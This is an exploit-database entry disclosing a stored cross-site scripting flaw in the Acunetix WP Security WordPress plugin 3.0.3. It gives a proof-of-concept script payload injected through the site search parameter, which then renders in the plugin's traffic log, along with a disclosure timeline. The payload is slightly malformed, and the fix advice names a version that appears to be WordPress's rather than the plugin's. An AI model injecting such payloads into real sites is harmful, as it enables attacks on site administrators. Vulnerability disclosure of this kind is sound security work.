WordPress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting

EDB-ID:

39761

CVE:

N/A




Platform:

PHP

Date:

2016-05-04


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

1. Introduction

# Exploit Title: Acunetix WP Security 3.0.3 XSS
# Date: May.03.2016
# Exploit Author: Johto Robbie
# Facebook: https://www.facebook.com/johto.robbie
# Vendor: VN Hacker News
# Tested On: Apache 2.4.17 / PHP 5.6.16 / Windows 10 / WordPress 4.5.1
# Category: Webapps
# Software Link:
http://localhost:8888/wordpress/wp-admin/admin.php?page=swpa_live_traffic

2. Descryption:

I have to insert scripts into the content search wordpress. The result is
that it is logging in Acunetix Secure WordPress. Taking advantage of this,
I have exploited XSS vulnerability

<span class="w-entry"><a
href="http://localhost:8888/wordpress/?s="><script>alert("Johto.Robbie"</script>"
target="_blank" title="Opens in a new tab">
http://localhost:8888/wordpress/?s=
"><script>alert("Johto.Robbie"</script></a></span>

Video Demonstration:
https://www.youtube.com/watch?v=L8t3_HGriP8&feature=youtu.be



3. Report Timeline

02-05-2016 : Discovered
02-05-2016 : Vendor notified


4. Solution

Update to version 4.5.1